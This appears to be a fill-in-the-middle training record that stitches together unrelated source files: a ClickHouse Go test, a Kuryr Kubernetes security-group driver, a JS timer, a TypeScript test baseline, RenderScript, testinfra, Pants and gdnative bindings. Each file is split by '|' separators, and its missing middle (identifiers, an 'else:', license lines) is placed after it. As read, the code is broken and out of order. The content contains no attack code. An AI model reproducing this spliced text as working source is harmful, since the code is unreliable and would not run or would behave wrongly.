string_test.go | // Licensed to ClickHouse, Inc. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. ClickHouse, Inc. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package tests
import (
"context"
"testing"
"github.com/ClickHouse/clickhouse-go/v2"
"github.com/stretchr/testify/assert"
)
func TestSimpleString(t *testing.T) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
Compression: &clickhouse.Compression{
Method: clickhouse.CompressionLZ4,
},
})
)
if assert.NoError(t, err) {
if err := checkMinServerVersion(conn, 21, 9, 0); err != nil {
			t.Skip(err.Error())
			return
}
const ddl = `
CREATE TABLE test_string (
Col1 String
) Engine Memory
`
defer func() {
conn.Exec(ctx, "DROP TABLE test_string")
}()
if err := conn.Exec(ctx, ddl); assert.NoError(t, err) {
if batch, err := conn.PrepareBatch(ctx, "INSERT INTO test_string"); assert.NoError(t, err) {
if err := batch.Append("A"); assert.NoError(t, err) {
					assert.NoError(t, batch.Send())
}
}
}
}
}
func TestString(t *testing.T) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
Compression: &clickhouse.Compression{
Method: clickhouse.CompressionLZ4,
},
})
)
if assert.NoError(t, err) {
if err := checkMinServerVersion(conn, 21, 9, 0); err != nil {
t.Skip(err.Error())
return
}
const ddl = `
CREATE TABLE test_string (
Col1 String
, Col2 Array(String)
, Col3 Nullable(String)
) Engine Memory
`
defer func() {
conn.Exec(ctx, "DROP TABLE test_string")
}()
if err := conn.Exec(ctx, ddl); assert.NoError(t, err) {
if batch, err := conn.PrepareBatch(ctx, "INSERT INTO test_string"); assert.NoError(t, err) {
if err := batch.Append("A", []string{"A", "B", "C"}, nil); assert.NoError(t, err) {
if assert.NoError(t, batch.Send()) {
var (
col1 string
col2 []string
col3 *string
)
if err := conn.QueryRow(ctx, "SELECT * FROM test_string").Scan(&col1, &col2, &col3); assert.NoError(t, err) {
if assert.Nil(t, col3) {
assert.Equal(t, "A", col1)
assert.Equal(t, []string{"A", "B", "C"}, col2)
}
}
}
}
}
}
}
}
func BenchmarkString(b *testing.B) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
})
)
if err != nil {
b.Fatal(err)
}
defer func() {
conn.Exec(ctx, "DROP TABLE benchmark_string")
}()
if err = conn.Exec(ctx, `CREATE TABLE benchmark_string (Col1 UInt64, Col2 String) ENGINE = Null`); err != nil {
b.Fatal(err)
}
const rowsInBlock = 10_000_000
for n := 0; n < b.N; n++ {
batch, err := conn.PrepareBatch(ctx, "INSERT INTO benchmark_string VALUES")
if err != nil {
b.Fatal(err)
}
for i := 0; i < rowsInBlock; i++ {
if err := batch.Append(uint64(1), "test"); err != nil {
b.Fatal(err)
}
}
if err = batch.Send(); err != nil {
b.Fatal(err)
}
}
}
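// The columnar variant below appends whole column slices once per block via
// batch.Column(i).Append(slice) instead of calling batch.Append per row,
// which cuts per-row call overhead on these 10M-row blocks.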
func BenchmarkColumnarString(b *testing.B) {
var (
ctx = context.Background()
conn, err = clickhouse.Open(&clickhouse.Options{
Addr: []string{"127.0.0.1:9000"},
Auth: clickhouse.Auth{
Database: "default",
Username: "default",
Password: "",
},
})
)
if err != nil {
b.Fatal(err)
}
defer func() {
conn.Exec(ctx, "DROP TABLE benchmark_string")
}()
if err = conn.Exec(ctx, `CREATE TABLE benchmark_string (Col1 UInt64, Col2 String) ENGINE = Null`); err != nil {
b.Fatal(err)
}
const rowsInBlock = 10_000_000
var (
col1 []uint64
col2 []string
)
for n := 0; n < b.N; n++ {
batch, err := conn.PrepareBatch(ctx, "INSERT INTO benchmark_string VALUES")
if err != nil {
b.Fatal(err)
}
col1 = col1[:0]
col2 = col2[:0]
for i := 0; i < rowsInBlock; i++ {
col1 = append(col1, uint64(1))
col2 = append(col2, "test")
}
if err := batch.Column(0).Append(col1); err != nil {
b.Fatal(err)
}
if err := batch.Column(1).Append(col2); err != nil {
b.Fatal(err)
}
if err = batch.Send(); err != nil {
b.Fatal(err)
}
}
} | |
network_policy_security_groups.py | # Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kuryr_kubernetes import clients
from kuryr_kubernetes import config
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base
from kuryr_kubernetes.controller.drivers import utils as driver_utils
from kuryr_kubernetes import exceptions
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
def _get_namespace_labels(namespace):
kubernetes = clients.get_kubernetes_client()
try:
path = '{}/{}'.format(
constants.K8S_API_NAMESPACES, namespace)
LOG.debug("K8s API Query %s", path)
namespaces = kubernetes.get(path)
LOG.debug("Return Namespace: %s", namespaces)
except exceptions.K8sResourceNotFound:
LOG.exception("Namespace not found")
raise
except exceptions.K8sClientException:
LOG.exception("Kubernetes Client Exception")
raise
return namespaces['metadata'].get('labels')
def _create_sg_rule(sg_id, direction, cidr, port=None, namespace=None):
if port:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, port.get('port'),
protocol=port.get('protocol'), cidr=cidr, namespace=namespace)
else:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, port_range_min=1,
port_range_max=65535, cidr=cidr, namespace=namespace)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
return sg_rule
def _get_crd_rule(crd_rules, container_port):
"""Returns a CRD rule that matches a container port
Retrieves the CRD rule that contains a given port in
the range of the rule ports.
"""
for crd_rule in crd_rules:
remote_ip_prefixes = crd_rule.get('remote_ip_prefixes')
min_port = crd_rule['security_group_rule'].get('port_range_min')
max_port = crd_rule['security_group_rule'].get('port_range_max')
        if (remote_ip_prefixes and
                min_port <= container_port <= max_port):
return crd_rule
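# Illustrative note (hypothetical rules): given crd_rules spanning ports
# 80-443 and 8000-9000, _get_crd_rule(crd_rules, 8080) returns the second
# rule, whose remote_ip_prefixes can then be extended in place.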
def _create_sg_rules_with_container_ports(matched_pods, container_ports,
allow_all, namespace, matched,
crd_rules, sg_id, direction,
port, rule_selected_pod):
"""Create security group rules based on container ports
If it's an allow from/to everywhere rule or a rule with a
NamespaceSelector, updates a sg rule that might already exist
and match the named port or creates a new one with the
remote_ip_prefixes field containing the matched pod info.
Otherwise, creates rules for each container port without
a remote_ip_prefixes field.
param matched_pods: List of dicts where the key is a container
port and value is the pods that have the port
param container_ports: List of tuples with pods and port values
    param allow_all: True if it's an allow from/to everywhere rule,
False otherwise.
param namespace: Namespace name
param matched: If a sg rule was created for the NP rule
param crd_rules: List of sg rules to update when patching the CRD
param sg_id: ID of the security group
param direction: String representing rule direction, ingress or egress
param port: Dict containing port and protocol
param rule_selected_pod: K8s Pod object selected by the rules selectors
return: True if a sg rule was created, False otherwise.
"""
for pod, container_port in container_ports:
pod_namespace = pod['metadata']['namespace']
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to "
"no IP assigned", pod['metadata']['name'])
continue
pod_info = {pod_ip: pod_namespace}
matched = True
if allow_all or namespace:
crd_rule = _get_crd_rule(crd_rules, container_port)
if crd_rule:
crd_rule['remote_ip_prefixes'].update(pod_info)
else:
if container_port in matched_pods:
matched_pods[container_port].update(pod_info)
else:
matched_pods[container_port] = pod_info
else:
pod_ip = driver_utils.get_pod_ip(rule_selected_pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to no IP "
"assigned", rule_selected_pod['metadata']['name'])
continue
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'),
cidr=pod_ip, pods=pod_info)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
if sg_rule not in crd_rules:
crd_rules.append(sg_rule)
return matched
def _create_sg_rule_on_text_port(sg_id, direction, port, rule_selected_pods,
crd_rules, matched, crd,
allow_all=False, namespace=None):
matched_pods = {}
spec_pod_selector = crd['spec'].get('podSelector')
policy_namespace = crd['metadata']['namespace']
spec_pods = driver_utils.get_pods(
spec_pod_selector, policy_namespace).get('items')
if direction == 'ingress':
for spec_pod in spec_pods:
container_ports = driver_utils.get_ports(spec_pod, port)
for rule_selected_pod in rule_selected_pods:
matched = _create_sg_rules_with_container_ports(
matched_pods, container_ports, allow_all, namespace,
matched, crd_rules, sg_id, direction, port,
rule_selected_pod)
elif direction == 'egress':
for rule_selected_pod in rule_selected_pods:
pod_label = rule_selected_pod['metadata'].get('labels')
pod_ns = rule_selected_pod['metadata'].get('namespace')
# NOTE(maysams) Do not allow egress traffic to the actual
# set of pods the NP is enforced on.
if (driver_utils.match_selector(spec_pod_selector, pod_label) and
policy_namespace == pod_ns):
continue
container_ports = driver_utils.get_ports(
rule_selected_pod, port)
matched = _create_sg_rules_with_container_ports(
matched_pods, container_ports, allow_all,
namespace, matched, crd_rules, sg_id, direction,
port, rule_selected_pod)
for container_port, pods in matched_pods.items():
if allow_all:
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'),
pods=pods)
else:
namespace_obj = driver_utils.get_namespace(namespace)
namespace_cidr = driver_utils.get_namespace_subnet_cidr(
namespace_obj)
sg_rule = driver_utils.create_security_group_rule_body(
sg_id, direction, container_port,
protocol=port.get('protocol'), cidr=namespace_cidr,
pods=pods)
sgr_id = driver_utils.create_security_group_rule(sg_rule)
sg_rule['security_group_rule']['id'] = sgr_id
crd_rules.append(sg_rule)
return matched
def _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched, namespace=None,
allow_all=False):
pod_labels = pod['metadata'].get('labels')
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule creation for pod %s due to "
"no IP assigned", pod['metadata']['name'])
return None
# NOTE (maysams) No need to differentiate between podSelector
# with empty value or with '{}', as they have same result in here.
if pod_selector:
if driver_utils.match_selector(pod_selector, pod_labels):
sg_id = crd['spec']['securityGroupId']
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = _create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd)
else:
matched = True
sg_rule = _create_sg_rule(
sg_id, direction, cidr=pod_ip, port=port,
namespace=namespace)
crd_rules.append(sg_rule)
else:
matched = True
sg_rule = _create_sg_rule(
sg_id, direction, cidr=pod_ip, namespace=namespace)
crd_rules.append(sg_rule)
else:
# NOTE (maysams) When a policy with namespaceSelector and text port
# is applied the port on the pods needs to be retrieved.
sg_id = crd['spec']['securityGroupId']
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd,
allow_all=allow_all, namespace=namespace))
return matched
def _parse_selectors_on_pod(crd, pod, pod_selector, namespace_selector,
rule_block, crd_rules, direction, matched):
pod_namespace = pod['metadata']['namespace']
pod_namespace_labels = _get_namespace_labels(pod_namespace)
policy_namespace = crd['metadata']['namespace']
if namespace_selector == {}:
matched = _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched,
allow_all=True)
elif namespace_selector:
if (pod_namespace_labels and
driver_utils.match_selector(namespace_selector,
pod_namespace_labels)):
matched = _create_sg_rules(crd, pod, pod_selector,
rule_block, crd_rules,
direction, matched,
namespace=pod_namespace)
else:
if pod_namespace == policy_namespace:
matched = _create_sg_rules(crd, pod, pod_selector, rule_block,
crd_rules, direction, matched,
namespace=pod_namespace)
return matched, crd_rules
def _parse_selectors_on_namespace(crd, direction, pod_selector,
ns_selector, rule_block, crd_rules,
namespace, matched):
ns_name = namespace['metadata'].get('name')
ns_labels = namespace['metadata'].get('labels')
sg_id = crd['spec']['securityGroupId']
if (ns_selector and ns_labels and
driver_utils.match_selector(ns_selector, ns_labels)):
if pod_selector:
pods = driver_utils.get_pods(pod_selector, ns_name).get('items')
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, pods,
                                crd_rules, matched, crd))
                    else:
                        matched = True
for pod in pods:
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
pod_name = pod['metadata']['name']
LOG.debug("Skipping SG rule creation for pod "
"%s due to no IP assigned", pod_name)
continue
crd_rules.append(_create_sg_rule(
sg_id, direction, pod_ip, port=port,
namespace=ns_name))
else:
for pod in pods:
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
pod_name = pod['metadata']['name']
LOG.debug("Skipping SG rule creation for pod %s due"
" to no IP assigned", pod_name)
continue
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, pod_ip,
namespace=ns_name))
else:
ns_pods = driver_utils.get_pods(ns_selector)
ns_cidr = driver_utils.get_namespace_subnet_cidr(namespace)
if 'ports' in rule_block:
for port in rule_block['ports']:
if type(port.get('port')) is not int:
matched = (
_create_sg_rule_on_text_port(
sg_id, direction, port, ns_pods,
crd_rules, matched, crd))
else:
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, ns_cidr,
port=port, namespace=ns_name))
else:
matched = True
crd_rules.append(_create_sg_rule(
sg_id, direction, ns_cidr,
namespace=ns_name))
return matched, crd_rules
def _parse_rules(direction, crd, pod=None, namespace=None):
policy = crd['spec']['networkpolicy_spec']
rule_direction = 'from'
crd_rules = crd['spec'].get('ingressSgRules')
if direction == 'egress':
rule_direction = 'to'
crd_rules = crd['spec'].get('egressSgRules')
matched = False
rule_list = policy.get(direction, [])
for rule_block in rule_list:
for rule in rule_block.get(rule_direction, []):
namespace_selector = rule.get('namespaceSelector')
pod_selector = rule.get('podSelector')
if pod:
matched, crd_rules = _parse_selectors_on_pod(
crd, pod, pod_selector, namespace_selector,
rule_block, crd_rules, direction, matched)
elif namespace:
matched, crd_rules = _parse_selectors_on_namespace(
crd, direction, pod_selector, namespace_selector,
rule_block, crd_rules, namespace, matched)
# NOTE(maysams): Cover the case of a network policy that allows
# from everywhere on a named port, e.g., when there is no 'from'
# specified.
if pod and not matched:
for port in rule_block.get('ports', []):
if type(port.get('port')) is not int:
sg_id = crd['spec']['securityGroupId']
if (not rule_block.get(rule_direction, [])
or direction == "ingress"):
matched = (_create_sg_rule_on_text_port(
sg_id, direction, port, [pod],
crd_rules, matched, crd,
allow_all=True))
return matched, crd_rules
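# NOTE: a hedged illustration of the case the final block above covers -- an
# ingress rule with a named (text) port and no 'from', which in Kubernetes
# means "allow from everywhere" (the values below are made up):
#
#   ingress:
#   - ports:
#     - port: http      # a named port, so type(port) is not int
#       protocol: TCP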
def _parse_rules_on_delete_namespace(rule_list, direction, ns_name):
matched = False
rules = []
for rule in rule_list:
LOG.debug('Parsing %(dir)s Rule %(r)s', {'dir': direction,
'r': rule})
rule_namespace = rule.get('namespace', None)
remote_ip_prefixes = rule.get('remote_ip_prefixes', [])
if rule_namespace and rule_namespace == ns_name:
matched = True
driver_utils.delete_security_group_rule(
rule['security_group_rule']['id'])
for remote_ip, namespace in remote_ip_prefixes:
if namespace == ns_name:
matched = True
remote_ip_prefixes.pop(remote_ip)
if remote_ip_prefixes:
rule['remote_ip_prefixes'] = remote_ip_prefixes
rules.append(rule)
else:
rules.append(rule)
return matched, rules
def _parse_rules_on_delete_pod(rule_list, direction, pod_ip):
matched = False
rules = []
for rule in rule_list:
LOG.debug('Parsing %(dir)s Rule %(r)s', {'dir': direction,
'r': rule})
remote_ip_prefix = rule['security_group_rule'].get(
'remote_ip_prefix')
remote_ip_prefixes = rule.get('remote_ip_prefixes', [])
if remote_ip_prefix and remote_ip_prefix == pod_ip:
matched = True
driver_utils.delete_security_group_rule(
rule['security_group_rule']['id'])
elif remote_ip_prefixes:
if pod_ip in remote_ip_prefixes:
matched = True
remote_ip_prefixes.pop(pod_ip)
if remote_ip_prefixes:
rule['remote_ip_prefixes'] = remote_ip_prefixes
rules.append(rule)
else:
rules.append(rule)
return matched, rules
def _get_pod_sgs(pod, project_id):
sg_list = []
pod_labels = pod['metadata'].get('labels')
pod_namespace = pod['metadata']['namespace']
knp_crds = driver_utils.get_kuryrnetpolicy_crds(
namespace=pod_namespace)
for crd in knp_crds.get('items'):
pod_selector = crd['spec'].get('podSelector')
if pod_selector:
if driver_utils.match_selector(pod_selector, pod_labels):
LOG.debug("Appending %s",
str(crd['spec']['securityGroupId']))
sg_list.append(str(crd['spec']['securityGroupId']))
else:
LOG.debug("Appending %s", str(crd['spec']['securityGroupId']))
sg_list.append(str(crd['spec']['securityGroupId']))
    # NOTE(maysams) Pods that are not selected by any NetworkPolicy
# are fully accessible. Thus, the default security group is associated.
if not sg_list:
sg_list = config.CONF.neutron_defaults.pod_security_groups
if not sg_list:
raise cfg.RequiredOptError('pod_security_groups',
cfg.OptGroup('neutron_defaults'))
return sg_list[:]
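# NOTE: a hedged sketch of the fallback above -- the helper returns the SG
# ids of every matching KuryrNetPolicy CRD, falls back to the configured
# defaults when no policy selects the pod, and raises RequiredOptError only
# when no defaults are configured either ('pod' is any k8s pod dict):
#
#   sgs = _get_pod_sgs(pod, project_id)
#   # -> e.g. ['<sg-uuid>'] or config.CONF.neutron_defaults.pod_security_groups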
class NetworkPolicySecurityGroupsDriver(base.PodSecurityGroupsDriver):
"""Provides security groups for pods based on network policies"""
def get_security_groups(self, pod, project_id):
return _get_pod_sgs(pod, project_id)
def create_sg_rules(self, pod):
LOG.debug("Creating sg rule for pod: %s", pod['metadata']['name'])
crd_pod_selectors = []
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
i_matched, i_rules = _parse_rules('ingress', crd, pod=pod)
e_matched, e_rules = _parse_rules('egress', crd, pod=pod)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
crd_pod_selectors.append(crd_selector)
return crd_pod_selectors
def delete_sg_rules(self, pod):
LOG.debug("Deleting sg rule for pod: %s", pod['metadata']['name'])
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule deletion as pod %s has no IP assigned",
pod['metadata']['name'])
return None
crd_pod_selectors = []
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
ingress_rule_list = crd['spec'].get('ingressSgRules')
egress_rule_list = crd['spec'].get('egressSgRules')
i_matched, i_rules = _parse_rules_on_delete_pod(
ingress_rule_list, "ingress", pod_ip)
e_matched, e_rules = _parse_rules_on_delete_pod(
egress_rule_list, "egress", pod_ip)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
crd_pod_selectors.append(crd_selector)
return crd_pod_selectors
def update_sg_rules(self, pod):
LOG.debug("Updating sg rule for pod: %s", pod['metadata']['name'])
crd_pod_selectors = []
crd_pod_selectors.extend(self.delete_sg_rules(pod))
crd_pod_selectors.extend(self.create_sg_rules(pod))
return crd_pod_selectors
def delete_namespace_sg_rules(self, namespace):
ns_name = namespace['metadata']['name']
LOG.debug("Deleting sg rule for namespace: %s",
ns_name)
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
ingress_rule_list = crd['spec'].get('ingressSgRules')
egress_rule_list = crd['spec'].get('egressSgRules')
i_matched, i_rules = _parse_rules_on_delete_namespace(
ingress_rule_list, "ingress", ns_name)
e_matched, e_rules = _parse_rules_on_delete_namespace(
egress_rule_list, "egress", ns_name)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(
crd, i_rules, e_rules, crd_selector)
def create_namespace_sg_rules(self, namespace):
kubernetes = clients.get_kubernetes_client()
ns_name = namespace['metadata']['name']
LOG.debug("Creating sg rule for namespace: %s", ns_name)
namespace = kubernetes.get(
'{}/namespaces/{}'.format(constants.K8S_API_BASE, ns_name))
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
i_matched, i_rules = _parse_rules(
'ingress', crd, namespace=namespace)
e_matched, e_rules = _parse_rules(
'egress', crd, namespace=namespace)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
def update_namespace_sg_rules(self, namespace):
LOG.debug("Updating sg rule for namespace: %s",
namespace['metadata']['name'])
self.delete_namespace_sg_rules(namespace)
self.create_namespace_sg_rules(namespace)
def create_namespace_sg(self, namespace, project_id, crd_spec):
LOG.debug("Security group driver does not create SGs for the "
"namespaces.")
return {}
def delete_sg(self, sg_id):
LOG.debug("Security group driver does not implement deleting "
"SGs.")
class NetworkPolicyServiceSecurityGroupsDriver(
base.ServiceSecurityGroupsDriver):
"""Provides security groups for services based on network policies"""
def get_security_groups(self, service, project_id):
sg_list = []
svc_namespace = service['metadata']['namespace']
svc_selector = service['spec'].get('selector')
        # skip if no selector
if svc_selector:
# get affected pods by svc selector
pods = driver_utils.get_pods({'selector': svc_selector},
svc_namespace).get('items')
            # NOTE(ltomasbo): We assume all the pods pointed to by a service
# have the same labels, and the same policy will be applied to
# all of them. Hence only considering the security groups applied
# to the first one.
if pods:
return _get_pod_sgs(pods[0], project_id)
return sg_list[:] | else: |
timer.js | function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }
function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; } |
export var Timer = // In a browser this is a number, but in node it's a NodeJS.Timeout (a
// class). We don't care about this difference.
function Timer(callback, timeMs) {
var _this = this;
_classCallCheck(this, Timer);
_defineProperty(this, "id", void 0);
_defineProperty(this, "callback", void 0);
_defineProperty(this, "finishTime", void 0);
_defineProperty(this, "timeRemaining", void 0);
_defineProperty(this, "pause", function () {
clearTimeout(_this.id);
_this.id = undefined;
_this.timeRemaining = (_this.finishTime || 0) - Date.now();
});
_defineProperty(this, "resume", function () {
_this.id = setTimeout(_this.finish, _this.timeRemaining);
_this.finishTime = Date.now() + (_this.timeRemaining || 0);
_this.timeRemaining = undefined;
});
_defineProperty(this, "clear", function () {
clearTimeout(_this.id);
_this.id = undefined;
_this.callback = undefined;
_this.finishTime = undefined;
_this.timeRemaining = undefined;
});
_defineProperty(this, "finish", function () {
if (_this.callback) {
_this.callback();
}
_this.clear();
});
this.id = setTimeout(this.finish, timeMs);
this.callback = callback;
this.finishTime = Date.now() + timeMs;
this.timeRemaining = undefined;
}; | |
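// NOTE: a hedged usage sketch of the Timer above -- pause() clears the
// timeout and stores the time remaining; resume() re-arms it, so the
// callback still fires exactly once:
//
//   var t = new Timer(function () { console.log('done'); }, 1000);
//   t.pause();                  // e.g. while work is suspended
//   setTimeout(t.resume, 500);  // later: reschedules with the remainder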
privateNameNestedClassFieldShadowing.js | //// [privateNameNestedClassFieldShadowing.ts]
class | {
#x;
constructor() {
class Derived {
#x;
testBase(x: Base) {
console.log(x.#x);
}
testDerived(x: Derived) {
console.log(x.#x);
}
}
}
}
//// [privateNameNestedClassFieldShadowing.js]
var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function (receiver, state, kind, f) {
if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a getter");
if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot read private member from an object whose class did not declare it");
return kind === "m" ? f : kind === "a" ? f.call(receiver) : f ? f.value : state.get(receiver);
};
var _Base_x;
class Base {
constructor() {
var _Derived_x;
_Base_x.set(this, void 0);
class Derived {
constructor() {
_Derived_x.set(this, void 0);
}
testBase(x) {
console.log(__classPrivateFieldGet(x, _Derived_x, "f"));
}
testDerived(x) {
console.log(__classPrivateFieldGet(x, _Derived_x, "f"));
}
}
_Derived_x = new WeakMap();
}
}
_Base_x = new WeakMap();
| Base |
TestFloor.rs | /*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, |
#pragma version(1)
#pragma rs java_package_name(android.renderscript.cts)
// Don't edit this file! It is auto-generated by frameworks/rs/api/gen_runtime.
float __attribute__((kernel)) testFloorFloatFloat(float in) {
return floor(in);
}
float2 __attribute__((kernel)) testFloorFloat2Float2(float2 in) {
return floor(in);
}
float3 __attribute__((kernel)) testFloorFloat3Float3(float3 in) {
return floor(in);
}
float4 __attribute__((kernel)) testFloorFloat4Float4(float4 in) {
return floor(in);
} | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/ |
test_installation.py | """
Role tests
"""
import os
from testinfra.utils.ansible_runner import AnsibleRunner
testinfra_hosts = AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_package(host):
"""
Ensure package installed
"""
if host.system_info.distribution in ('debian', 'ubuntu'):
assert host.package('xvfb').is_installed
else:
assert host.package('xorg-x11-server-Xvfb').is_installed
def | (host):
"""
Ensure service running
"""
xvfb_service = host.service('xvfb')
assert xvfb_service.is_enabled
assert xvfb_service.is_running
def test_process(host):
"""
Ensure process running
"""
xvfb_process = host.process.get(user='root', comm='Xvfb')
assert ':99 -screen 0 1x1x24 -ac +extension GLX +render -noreset' in \
xvfb_process.args
assert len(host.process.filter(comm='Xvfb')) == 1
| test_service |
test_help_formatter.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.help.help_formatter import HelpFormatter
from pants.help.help_info_extracter import OptionHelpInfo
class OptionHelpFormatterTest(unittest.TestCase):
def format_help_for_foo(self, **kwargs):
ohi = OptionHelpInfo(registering_class=type(None), display_args=['--foo'],
scoped_cmd_line_args=['--foo'], unscoped_cmd_line_args=['--foo'],
typ=bool, fromfile=False, default=None, help='help for foo',
deprecated_version=None, deprecated_message=None, deprecated_hint=None,
choices=None)
ohi = ohi._replace(**kwargs)
lines = HelpFormatter(scope='', show_recursive=False, show_advanced=False,
color=False).format_option(ohi)
self.assertEquals(len(lines), 2)
self.assertIn('help for foo', lines[1])
return lines[0]
def test_format_help(self):
line = self.format_help_for_foo(default='MYDEFAULT')
self.assertEquals('--foo (default: MYDEFAULT)', line)
def test_format_help_fromfile(self):
line = self.format_help_for_foo(fromfile=True)
self.assertEquals('--foo (@fromfile value supported) (default: None)', line)
| def test_suppress_advanced(self):
args = ['--foo']
kwargs = {'advanced': True}
lines = HelpFormatter(scope='', show_recursive=False, show_advanced=False,
color=False).format_options('', '', [(args, kwargs)])
self.assertEquals(0, len(lines))
lines = HelpFormatter(scope='', show_recursive=True, show_advanced=True,
color=False).format_options('', '', [(args, kwargs)])
print(lines)
self.assertEquals(5, len(lines))
def test_format_help_choices(self):
line = self.format_help_for_foo(typ=str, default='kiwi', choices='apple, banana, kiwi')
self.assertEquals('--foo (one of: [apple, banana, kiwi] default: kiwi)', line) | |
gdnative.gen.go | package gdnative
/*------------------------------------------------------------------------------
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated. Any updates should be done in
// "types.go.tmpl" so they can be included in the generated
// code.
//----------------------------------------------------------------------------*/
/*
#cgo CFLAGS: -I../godot_headers
#include "gdnative.gen.h"
// #include <godot_headers/gdnative/gdnative.h>
// Include all headers for now. TODO: Look up all the required
// headers we need to import based on the method arguments and return types.
#include <gdnative/aabb.h>
#include <gdnative/array.h>
#include <gdnative/basis.h>
#include <gdnative/color.h>
#include <gdnative/dictionary.h>
#include <gdnative/gdnative.h>
#include <gdnative/node_path.h>
#include <gdnative/plane.h>
#include <gdnative/pool_arrays.h>
#include <gdnative/quat.h>
#include <gdnative/rect2.h>
#include <gdnative/rid.h>
#include <gdnative/string.h>
#include <gdnative/string_name.h>
#include <gdnative/transform.h>
#include <gdnative/transform2d.h>
#include <gdnative/variant.h>
#include <gdnative/vector2.h>
#include <gdnative/vector3.h>
#include <gdnative_api_struct.gen.h>
*/
import "C"
import "unsafe"
// Error is a Go wrapper for the C.godot_error enum type.
type Error int
func (e Error) getBase() C.godot_error {
return C.godot_error(e)
}
const (
Ok Error = 0 // (0)
Failed Error = 1 // < Generic fail error
